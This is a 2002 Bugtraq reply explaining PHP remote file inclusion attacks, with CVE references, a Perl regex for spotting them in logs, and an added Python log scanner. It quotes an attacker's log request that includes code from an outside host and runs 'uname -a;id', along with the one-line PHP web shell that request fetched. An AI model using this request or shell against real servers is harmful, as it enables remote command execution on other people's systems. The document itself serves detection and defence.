From: Steven M. Christey (coley_at_linus.mitre.org)
Date: Wed Sep 18 2002 - 21:49:26 CDT
zeno <bugtraq_at_cgisecurity.net> said:
>I figured a few people may find this interesting.
>
>
>200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
>
>contents of www.jtecx.hpg.com.br/jtec.txt
>
>------------------- start snip
>
><?php
>system($cmd);
>?>
>
>------------------- end snip
A number of PHP scripts have demonstrated this type of vulnerability,
which was documented in "A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP Applications" by Shaun Clowes; see
http://www.securereality.com.au/studyinscarlet.txt
(http://www.zend.com/zend/art/art-oertli.php also looks useful). This
has been a topic of discussion on the webappsec list.
Basically, PHP can allow the programmer to access files from remote
sites. PHP scripts that don't properly filter arguments to an
"include" command can have a remote URL injected by the attacker. PHP
also allows you to define variables as a parameter (field) into the
script. The combination of these factors makes it easy for an
attacker to execute code in the vulnerable application. Note: this
may be dependent on configuration and/or the PHP version.
Some vulnerable applications are:
BUGTRAQ:20001125 Security problems with TWIG webmail system
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
(CVE: CVE-2000-1166)
BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
(CVE: CAN-2002-0206)
[this could be the vulnerability being exploited in zeno's example]
BUGTRAQ:20020506 b2 php remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
(CVE: CAN-2002-0734)
BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
(CVE: CAN-2002-0764)
A generic Perl regular expression to catch some of these exploits is:
/\.php[2-9]?\?.*=http:\/\//
This seems to do a good job, although it could generate some false
positives for valid PHP scripts that pass URLs as arguments, e.g. for
redirecting the user out of the site.
- Steve
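As an added example (not part of Steve's message or zeno's post), here is the regex above in Python, applied to a few constructed Apache combined-format log lines: zeno's line from the post, a constructed .php3 request of the same shape, a legitimate outbound redirect of the kind Steve says will trip the rule, and a plain benign request. The KNOWN_URL_ENDPOINTS allowlist, the helper names and every IP/host other than the one in zeno's line are assumptions made up for the example; the allowlist is the tuning knob for the false positives the post warns about.

```python
import re
from typing import NamedTuple, Optional, List

# Steve's Perl pattern /\.php[2-9]?\?.*=http:\/\// in Python syntax:
# a .php (or .php2 .. .php9) script whose query string assigns an
# http:// URL to some parameter.
REMOTE_INCLUDE_RE = re.compile(r"\.php[2-9]?\?.*=http://")

# Enough of an Apache combined-log line to pull out the fields we report.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3})'
)

# Assumption: scripts on *this* site that legitimately take a URL parameter
# (e.g. an outbound redirect). Hits on these are kept but flagged as
# suppressed rather than alerted, per the false-positive caveat in the post.
KNOWN_URL_ENDPOINTS = {"/redirect.php"}


class Finding(NamedTuple):
    ip: str
    time: str
    request: str
    status: str
    verdict: str  # "alert" or "suppressed"


def classify(line: str) -> Optional[Finding]:
    """Return a Finding if the request line matches the pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request = m.group("request")
    if not REMOTE_INCLUDE_RE.search(request):
        return None
    # Request line is "METHOD PATH HTTP/x"; keep the script path without its query.
    parts = request.split()
    path = parts[1] if len(parts) >= 2 else request
    script = path.split("?", 1)[0]
    verdict = "suppressed" if script in KNOWN_URL_ENDPOINTS else "alert"
    return Finding(m.group("ip"), m.group("time"), request, m.group("status"), verdict)


def scan(lines: List[str]) -> List[Finding]:
    """Run classify() over a log and keep only the lines that matched."""
    return [f for f in (classify(l) for l in lines) if f is not None]


# Constructed sample log. The first line is the one from zeno's post; the
# rest are made up for this example (documentation/test-net addresses).
SAMPLE_LOG = [
    '200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"',
    '198.51.100.7 - - [14/Sep/2002:17:02:10 -0400] "GET /forum.php3?config=http://203.0.113.9/x.txt HTTP/1.0" 200 1188 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [14/Sep/2002:17:05:44 -0400] "GET /redirect.php?url=http://www.example.com/ HTTP/1.0" 302 231 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [14/Sep/2002:17:06:01 -0400] "GET /index.php?page=about HTTP/1.0" 200 4120 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.verdict:10} {f.ip:15} {f.status} {f.request}")
```

Note that the pattern is literal and case-sensitive, exactly as in the post; it is a cheap first pass over access logs, not a complete signature, and the allowlist only reduces noise from endpoints you have already reviewed.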
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com